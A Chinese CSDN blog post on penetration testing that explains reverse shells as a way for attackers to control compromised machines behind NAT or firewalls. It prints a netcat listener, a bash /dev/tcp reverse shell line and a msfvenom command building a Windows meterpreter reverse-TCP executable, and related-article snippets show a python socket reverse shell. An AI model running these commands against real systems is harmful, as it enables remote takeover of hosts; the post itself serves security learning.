渗透测试之反弹shell

最新推荐文章于 2024-04-26 15:46:56 发布
最新推荐文章于 2024-04-26 15:46:56 发布
阅读量520 收藏 2
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_97_97/article/details/104907791
版权

什么是反弹shell

攻击者想要控制肉鸡,就必须要一个数据传输的通道(TCP/UDP),可以通过ssh或telnet来远程登录来进行操作。这些都是攻击者主动连接肉鸡,如果肉鸡主动连接攻击者实现的shell通道,,就叫反弹shell。

为什么要反弹shell

因为正面不好搞,所以需要反向搞。比如攻击者在肉鸡上上传了一个小马,可能会出现的情况有:
1.肉鸡在局域网内,没有外网地址,连不上。
2.肉鸡有外网地址,但是经常变,不能持续控制它。
3.肉鸡前面有WAF防护,对近来的request请求做了过滤,很难绕过。
那么就可以在肉鸡上启动一个tcpserver,让肉鸡主动连接,由此建立一个数据通道来执行shell。
攻击端执行:

nc -lvp 4100  #启动一个端口为4100的tcpserver

被攻击端执行:

bash -i >& dev/tcp/攻击端ip/4100 0>&1 #反弹shell

bash -i >& /dev/tcp/攻击端ip/4100 0>&1
bash -i 表示启动一个交互式的shell;
>& 这个交互式shell的标准输出和标准错误输出,重定向到这socket上/dev/tcp/攻击端ip/4100,也即发送到/dev/tcp/攻击端ip/4100远端;
0>&1 标准输入重定向到标准输出上;
简而言之,就是启动一个交互式shell,这个交互式shell的输入来自攻击端,输出也到攻击端。

通过bash -i的是最简单但也是最容易被识别的反弹shell,在没有任何防护的机器上执行时没有问题的。
可以用MSF生成的shell。

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.5.32 lport=443 -f exe -o shell.exe
老头儿给钱
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
91-91.渗透测试-通过木马反弹shell(Linux).mp4
05-10
91-91.渗透测试-通过木马反弹shell(Linux).mp4
82-82.渗透测试-CVE-2017-8464“震网三代 反弹shell演示课件.mp4
05-10
82-82.渗透测试-CVE-2017-8464“震网三代 反弹shell演示课件.mp4
渗透测试/反弹shell
dkpower111的博客
02-02 281
Linux下的反弹shell 1、什么是反弹shell 就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 2、反弹shell的原因 通常用于被控端因防火墙受限、权限不足、端口被占用等情形 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
寻觅的博客
04-19 2448
文章目录相关博客反弹shell介绍Linux基础重定向标准文件操作符空文件联合使用常用反弹方式NetCat(NC)反弹正向NC反向NC 相关博客 Linux信息收集、渗透测试常用命令: https://xunmi.blog.csdn.net/article/details/114970239 Linux常用提权方法: https://xunmi.blog.csdn.net/article/details/115187418 渗透测试常用反弹shell方法(如何渗透测试反弹shell?: https://x
渗透测试学习25:反弹shell
weixin_44315099的博客
03-22 435
目录简述linux下文件描述符和重定向文件描述符重定向输入重定向:` [n]< word `输出重定向:`[n]> word`标准输出与标准错误输出重定向:`&> word`文件描述符的复制Linux 反弹shell原理常用linux下反弹shellwindows下反弹shell总结 简述 反弹shell就是: 就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上
内网渗透-反弹shell的N种姿势
lza20001103的博客
04-15 1206
内网渗透-反弹shell的N种姿势
linux 渗透 反弹shell,【技术分享】Linux渗透之反弹Shell命令解析
weixin_26814683的博客
05-13 251
前言当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。Bash这篇文章的起因就是网上给的Ba...
89-89.渗透测试-通过木马反弹shell(Android).mp4
05-10
89-89.渗透测试-通过木马反弹shell(Android).mp4
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
反弹shell渗透测试中的关键技术,它涉及被控端主动通过网络连接到受控端,将命令行的输入输出转发到受控端。作者将反弹shell分为两个核心部分:网络连接和命令执行。 1. **本质** 反弹shell的本质是被控端与受控...
渗透测试常用工具应用(PDF课件)
最新发布
05-30
使用msfvenom生成木马进行渗透测试.pdf 使用Netcat进行反弹链接实验.pdf 使用meterpreter模块进行后渗透测试.pdf 使用Hydra进行密码破解.pdf 使用Saminside+Ophcrack破解本地用户密码.pdf 使用metasploit进行Hash...
另一种反弹shell的方式
公众号shadow sock7
07-01 782
先在自己机器上执行[~]$ nc -vl 192.168.170.1 1234即在192.168.170.1/24网段上坚挺1234端口。 然后在target的shell中执行[~/repos/CTF/BSides-CTF-2017]$ python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK
关于反弹shell【总结相关技术、细节易错点、问题等】
我这不是依托答辩随你怎么说
02-18 368
关于反弹shell(总结相关技术、细节易错点、问题等),shell中的>&和&>以及ncat中的用法区别。
大家一起学安全之反弹shell
zzouri的博客
05-07 369
最近在工作中发现,一线研发类的同学对基本的安全的知识缺乏必要的了解,进而产生出这样的一些想法(纯属想象。。。): 你看我的密码zhangsan!@#123, 密码字母,数字,特殊字符都有了,别人肯定猜不到… 天啊,密码要三个月必须改一次,是不是吃饱了没事干… 安全又搞事情了,这也不能访问,那也需要认证,心里默默飘过了一万个草泥马… 每次访问数据库,流程一大堆,我自己写个PHP后门挂上去,可以随时...
ddos(分布式拒绝服务攻击)分为两种**直接攻击**/**反弹攻击(间接攻击)ddos及对抗方法ip溯源的实现原理和防御措施
qq_37092496的博客
03-13 1万+
ddos(分布式拒绝服务攻击)分为两种直接攻击/反弹攻击(间接攻击) ddos的实现原理是基于tcp/ip的三次握手实现的 攻击者将发送ip设置为虚假ip,受访者在进行第二次握手时,不能判断ip真伪,向源地址发送响应包,并且等待第三次握手,随时间响应丢失,却占用cpu和内存 直接攻击(控制肉鸡发送大量虚假请求) 就是通过大量的这种虚假连接,消耗主机资源,造成主机资源枯竭,从而导致正常的用户不能进行正常访问。 反弹攻击(反弹shell??)(模拟正常用户访问) 是将包含假受害者的ip数据包发送到一些反射体上
centos云服务器安装cs(cobaltstrike4
2401_84253380的博客
04-26 328
wget https://repo.huaweicloud.com/java/jdk/8u201-b09/jdk-8u201-linux-x64.tar.gz #下载jdk压缩包tar -zxvf jdk-8u201-linux-x64.tar.gz #解压解压完之后生成一个jdk1.8.0_201文件mv jdk1.8.0_201 /usr/local/jdk1.8/ #把jdk1.8.0_201文件移动到usr/local/jdk1.8/目录下配置环境变量。
白帽黑客之Metasploit
10-25
本套教程,我们将为大家详细讲解Metasploit的使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。 
反弹shell的方法和测试
weixin_43847235的博客
11-14 584
反弹shell的概念 简单理解,通常是我们主动发起请求,去访问服务器(某个IP的某个端口),比如我们常访问的web服务器:http(https)????/ip:80,这是因为在服务器上面开启了80端口的监听,我们去访问它的时候,就会给我们建立连接。而现在所谓的反弹shell指的是反过来在我们自己的公网vps建立监听,然后让服务器反弹一个shell来连接我们自己的主机,然后我们就能通过反弹shell去...
反弹shell失败的几种原因
热门推荐
谢公子的博客
05-03 1万+
在实战中,我们经常会遇到各种各样奇怪的环境。 反弹shell失败的原因有很多: 反弹的命令不存在或当前用户无权限调用bash 禁止出站IP 禁止出站端口 禁止出站协议 反弹的命令不存在或当前用户无权限调用bash 由于这种情况下只局限于Linux,所以不考虑Windows 反弹shell的命令,尽管这么多命令可以反弹shell,但是最终都还是调用bash反弹,所以 #bas...
如何用内网虚拟机kali实现反弹shell
qq_44657899的博客
05-23 9616
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击机:kali虚拟机(位于内网) ip:192.168.77.128 宿主机:win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我
渗透测试必备:反弹shell手法详解与实战技巧
反弹shell渗透测试和网络安全中扮演着至关重要的角色,它允许攻击者在目标系统上获取交互式shell,突破防火墙限制,进行更深入的操作和权限提升。本文档提供了一套详细的反弹shell技巧,适用于不同操作系统环境下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值